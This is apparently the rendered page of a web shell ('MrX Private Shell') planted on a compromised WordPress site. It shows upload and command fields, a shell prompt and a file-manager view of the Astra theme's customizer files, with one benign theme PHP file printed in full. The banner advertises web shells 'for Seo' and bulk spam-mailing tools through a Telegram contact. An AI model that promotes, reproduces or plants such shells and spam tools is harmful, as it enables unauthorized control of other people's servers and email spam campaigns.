__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php
/**
 * Override default customizer panels, sections, settings or controls.
 *
 * @package     Astra
 * @link        https://wpastra.com/
 * @since       Astra 1.0.0
 */

if ( ! defined( 'ABSPATH' ) ) {
	exit; // Exit if accessed directly.
}

/**
 * Override Sections
 */
$wp_customize->get_section( 'title_tagline' )->priority = 5;
$wp_customize->get_section( 'title_tagline' )->panel    = 'panel-header-group';

/**
 * Override Settings
 */
$wp_customize->get_setting( 'blogname' )->transport         = 'postMessage';
$wp_customize->get_setting( 'blogdescription' )->transport  = 'postMessage';
$wp_customize->get_setting( 'header_textcolor' )->transport = 'postMessage';
$wp_customize->get_setting( 'custom_logo' )->transport      = 'refresh';

/**
 * Override Controls
 */
$wp_customize->get_control( 'custom_logo' )->priority      = 5;
$wp_customize->get_control( 'blogname' )->priority         = 8;
$wp_customize->get_control( 'blogdescription' )->priority  = 12;
$wp_customize->get_control( 'header_textcolor' )->priority = 9;

if ( isset( $wp_customize->selective_refresh ) ) {
	$wp_customize->selective_refresh->add_partial(
		'blogname',
		array(
			'selector'            => '.main-header-bar .site-title a,  .ast-small-footer-wrap .ast-footer-site-title',
			'container_inclusive' => false,
			'render_callback'     => 'Astra_Customizer_Partials::render_partial_site_title',
		)
	);
}

if ( isset( $wp_customize->selective_refresh ) ) {
	$wp_customize->selective_refresh->add_partial(
		'blogdescription',
		array(
			'selector'            => '.main-header-bar .site-description',
			'container_inclusive' => false,
			'render_callback'     => 'Astra_Customizer_Partials::render_partial_site_tagline',
		)
	);
}

/*
 * Modify WooCommerce default section priorities
*/
if ( class_exists( 'WooCommerce' ) ) {
	$wp_customize->get_section( 'woocommerce_product_images' )->priority  = 25;
	$wp_customize->get_section( 'woocommerce_store_notice' )->priority    = 26;
	$wp_customize->get_section( 'woocommerce_product_catalog' )->priority = 11;
	$wp_customize->get_section( 'woocommerce_checkout' )->priority        = 21;
	$wp_customize->get_section( 'woocommerce_checkout' )->description     = '';
	$wp_customize->get_panel( 'woocommerce' )->priority                   = 70;
}

Filemanager

Name Type Size Permission Actions
astra-pro Folder 0750
configurations Folder 0750
custom-controls Folder 0750
extend-custom-controls Folder 0750
extend-customizer Folder 0750
class-astra-builder-customizer.php File 17.99 KB 0640
class-astra-customizer-callback.php File 1.17 KB 0640
class-astra-customizer-partials.php File 3.82 KB 0640
class-astra-customizer-register-sections-panels.php File 12.47 KB 0640
class-astra-customizer-sanitizes.php File 24.91 KB 0640
class-astra-customizer.php File 75.93 KB 0640
class-astra-extended-base-configuration.php File 6.62 KB 0640
class-astra-font-families.php File 4.54 KB 0640
class-astra-fonts-data.php File 904 B 0640
class-astra-fonts.php File 4.86 KB 0640
customizer-controls.php File 881 B 0640
index.php File 111 B 0640
override-defaults.php File 2.23 KB 0640
Filemanager